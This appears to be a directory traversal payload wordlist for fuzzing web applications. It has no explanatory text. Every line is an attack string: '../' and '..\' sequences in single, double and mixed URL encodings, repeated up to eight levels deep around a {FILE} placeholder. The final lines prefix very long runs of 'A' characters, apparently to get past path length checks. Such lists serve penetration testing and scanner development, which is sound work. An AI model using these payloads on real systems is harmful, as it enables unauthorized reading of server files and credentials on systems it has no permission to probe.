%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
..\{FILE}
..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%5c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
\../{FILE}
\../\../{FILE}
\../\../\../{FILE}
\../\../\../\../{FILE}
\../\../\../\../\../{FILE}
\../\../\../\../\../\../{FILE}
\../\../\../\../\../\../\../{FILE}
\../\../\../\../\../\../\../\../{FILE}
/..\{FILE}
/..\/..\{FILE}
/..\/..\/..\{FILE}
/..\/..\/..\/..\{FILE}
/..\/..\/..\/..\/..\{FILE}
/..\/..\/..\/..\/..\/..\{FILE}
/..\/..\/..\/..\/..\/..\/..\{FILE}
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}
